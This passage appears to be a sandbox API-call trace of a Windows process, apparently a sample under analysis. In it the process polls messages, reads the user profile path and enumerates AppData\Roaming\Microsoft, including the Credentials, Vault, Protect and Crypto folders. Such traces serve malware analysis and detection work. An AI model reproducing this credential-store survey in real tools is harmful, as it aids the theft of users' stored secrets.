lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0124.343] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0124.343] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0124.343] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0124.344] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0124.344] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.344] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0124.344] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.344] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0124.344] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.344] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.344] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0124.344] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0124.344] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0124.344] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0124.344] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0124.344] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0124.344] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.344] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0124.344] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0124.344] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0124.344] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0124.344] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0124.344] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.344] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0124.344] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0124.344] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0124.344] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0124.345] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0124.345] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0124.345] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0124.345] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0124.345] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0124.345] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0124.345] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0124.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7140, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0124.345] CryptReleaseContext (hProv=0x9bf330, dwFlags=0x0) returned 1 [0124.345] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.345] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0124.345] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0124.345] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0124.345] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0124.345] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0124.345] FreeLibrary (hLibModule=0x76390000) returned 1 [0124.345] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.345] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0124.345] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.345] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.345] CloseHandle (hObject=0x4fc) returned 1 [0124.346] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0124.346] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0124.346] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0124.346] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0124.346] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0124.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0124.347] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0124.347] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Microsoft", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft", lpFilePart=0x8cedf4*="Microsoft") returned 0x29 [0124.347] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft")) returned 0x14 [0124.347] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9a47c0 [0124.347] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0124.347] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3385793c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x33c5d8bc, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x33c5d8bc, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Access", cAlternateFileName="")) returned 1 [0124.347] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x208511b9, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x208511b9, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x208511b9, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="AddIns", cAlternateFileName="")) returned 1 [0124.347] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d0f124, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d0f124, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2d35364, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0124.347] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x39c1605f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd370742a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x39c1605f, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0124.347] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x789ca310, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x789ca310, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x789cc9c3, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Crypto", cAlternateFileName="")) returned 1 [0124.347] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32ff935, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x32ff935, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x32ff935, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0124.347] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x208e9b07, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x12e96cf, ftLastAccessTime.dwHighDateTime=0x1d327c7, ftLastWriteTime.dwLowDateTime=0x12e96cf, ftLastWriteTime.dwHighDateTime=0x1d327c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Excel", cAlternateFileName="")) returned 1 [0124.347] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8923b24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3800a8f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe8923b24, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="InputMethod", cAlternateFileName="INPUTM~1")) returned 1 [0124.347] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34791fac, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xabc78877, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xabc78877, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0124.347] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc79a26a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xc79a26a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc79a26a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="MMC", cAlternateFileName="")) returned 1 [0124.347] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee6ea6d8, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="MS Project", cAlternateFileName="MSPROJ~1")) returned 1 [0124.347] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3fa09c, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xab3fa09c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xab3fa09c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Network", cAlternateFileName="")) returned 1 [0124.347] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f2525a, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x15925c1b, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x15925c1b, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Office", cAlternateFileName="")) returned 1 [0124.347] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b1656b, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa8b1656b, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xdd629eb7, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Outlook", cAlternateFileName="")) returned 1 [0124.348] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b00229f, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x1b00229f, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x1b00229f, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="PowerPoint", cAlternateFileName="POWERP~1")) returned 1 [0124.348] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f58c1c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x6f58c1c, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x6f58c1c, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Proof", cAlternateFileName="")) returned 1 [0124.348] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fb5efac, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b7903de, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3b7903de, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Protect", cAlternateFileName="")) returned 1 [0124.348] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x422eea37, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x422eea37, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x422eea37, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0124.348] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43fd72ee, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0xde511f85, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0xde511f85, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Publisher Building Blocks", cAlternateFileName="PUBLIS~2")) returned 1 [0124.348] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd38fae20, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xd38fae20, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xd38fae20, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Signatures", cAlternateFileName="SIGNAT~1")) returned 1 [0124.348] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7161656c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xe2954bc8, ftLastAccessTime.dwHighDateTime=0x1d336d6, ftLastWriteTime.dwLowDateTime=0xe2954bc8, ftLastWriteTime.dwHighDateTime=0x1d336d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Speech", cAlternateFileName="")) returned 1 [0124.348] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd38d4b92, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xd38d4b92, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xd38d4b92, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0124.348] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab505145, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xab505145, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xab505145, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0124.348] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacdbc5f1, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xe3719c0d, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0xf50bbe18, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0124.348] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed4f486b, ftCreationTime.dwHighDateTime=0x1d327b5, ftLastAccessTime.dwLowDateTime=0xed4f486b, ftLastAccessTime.dwHighDateTime=0x1d327b5, ftLastWriteTime.dwLowDateTime=0xed4f486b, ftLastWriteTime.dwHighDateTime=0x1d327b5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="UProof", cAlternateFileName="")) returned 1 [0124.348] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfaff70b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3bb556b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xbfaff70b, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Vault", cAlternateFileName="")) returned 1 [0124.348] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xd65f9933, ftLastAccessTime.dwHighDateTime=0x1d327c2, ftLastWriteTime.dwLowDateTime=0xd65f9933, ftLastWriteTime.dwHighDateTime=0x1d327c2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Windows", cAlternateFileName="")) returned 1 [0124.348] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x300a046, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x300a046, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x300a046, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Word", cAlternateFileName="")) returned 1 [0124.348] FindNextFileW (in: hFindFile=0x9a47c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, 